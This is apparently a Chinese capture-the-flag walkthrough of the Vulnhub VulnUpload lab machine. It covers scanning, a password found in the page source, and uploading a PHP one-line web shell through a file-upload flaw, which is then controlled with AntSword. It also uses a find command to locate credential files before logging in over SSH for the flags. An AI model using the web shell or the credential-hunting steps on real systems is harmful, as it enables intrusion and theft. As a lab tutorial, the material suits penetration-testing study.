攻击机:Kali Linux
靶机环境:Linux-VulnUpload
所用工具:nmap | Burpsuite | 蚁剑
0x00 知识点
-
robots.txt 扫描 -
蚁剑基础连接使用 -
隐藏文件查找
0x01靶机搭建
首先从上面地址中下载好靶机,并直接解压导入虚拟机后,将该虚拟机的网路设为NAT模式。之后打开虚拟机,进入到开机界面。(这里一定要迅速把鼠标点进去,之后快速摁向下方向键,否则,会自动帮你进入第一个。)
跟着步骤走。。。
选择进入root模式。。。之后就到了考验命令行的时候了。
先输入:mount -o rw,remount /
之后再输入
ifconfig -a
查看你的网卡名称,并记住哦,以后用的到。。
使用vim编辑器,去修改/etc/network/interfaces 文件中的数据(如图输入)
将这里改成你刚刚看到的网卡名称(我的图就是已经改完的了哈。)
之后保存退出,w是保存,q是退出,wq是保存并退出
并且每个命令如果后面加!的话就是强制执行
之后,你的环境就搭建好了,重启如下为正常启动后的画面
0x02 信息搜集
端口发现
arp-scan -l
扫描网段
这里发现靶机的IP地址为192.168.15.128,攻击机kali的IP地址为192.168.15.131
使用nmap进行深度的扫描
nmap -A -T4 -p- 192.168.15.128
综上信息搜集可以发现,目标服务器为Linux系统,开放了ssh 22端口,http 80端口,重点考虑从web页面找寻突破口
0x03 获取Flag
第一个flag
这里发现靶机开放了ssh 22端口,http 80端口。并在robots.txt中,发现疑似flag。
我们尝试浏览器输入 http://192.168.15.128/flag 去访问
发现flag1:{8734509128730458630012095}
第二个flag
接下来我们尝试使用dirsearch扫描一下网页目录
dirsearch -u 192.168.15.128
http://192.168.15.128/admin_area/
http://192.168.15.128/assets/
http://192.168.15.128/css/
在浏览器中访问http://192.168.15.128/admin_area/,F12发现了admin用户以及其密码:3v1l_H@ck3r。
发现flag2:{7412574125871236547895214}
第三个flag
浏览器访问http://192.168.15.128 ,使用刚才得到的admin用户及密码3v1l_H@ck3r尝试登录。
成功进入后发现是可以上传文件的页面,可以尝试是否存在文件上传漏洞
写入一句话木马到文件中
<?php
eval
($_REQUEST );
?>
使用中国蚁剑进行连接
连接成功,说明存在文件上传漏洞
查看hint.txt文件,发现flag3以及提示查找用户technawi
发现flag3:{7645110034526579012345670}
第四个flag
刚才在第三个flag提示我们用technawi去读取flag.txt文件,可以在隐藏文件中找到用户的信息
try to find user technawi password to read the flag.txt file, you can find it in a hidden file
蚁剑打开虚拟终端,查找用户信息,2>/dev/null是过滤掉类似没有权限的信息
find / -user
'technawi'
2>/dev/null
此时我们看到了一个特殊的文件/etc/mysql/conf.d/credentials.txt ,我们尝试去读一下里面的信息,得到flag4以及username和password
发现flag4:{7845658974123568974185412}
第五个flag
根据flag3的提示,我们登录technawi用户直接查看/var/www/html/flag.txt
ssh [email protected]
cat /var/www/html/flag.txt
发现flag5:{5473215946785213456975249}
0x04 总结
此靶机一共找到了5个flag,难度不大,但是流程全面,分别通过端口扫描、网站目录扫描得到账密成功登录网站,并通过发现文件上传漏洞,利用一句话木马传到靶机,再通过蚁剑进行连接,最后查找并登录technawi用户查看隐藏文件flag.txt得到全部flag,完成该靶机可以熟悉掌握渗透的初步流程。
原文始发于微信公众号(网络安全自修室):Vulnhub-VulnUpload靶机渗透实战
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论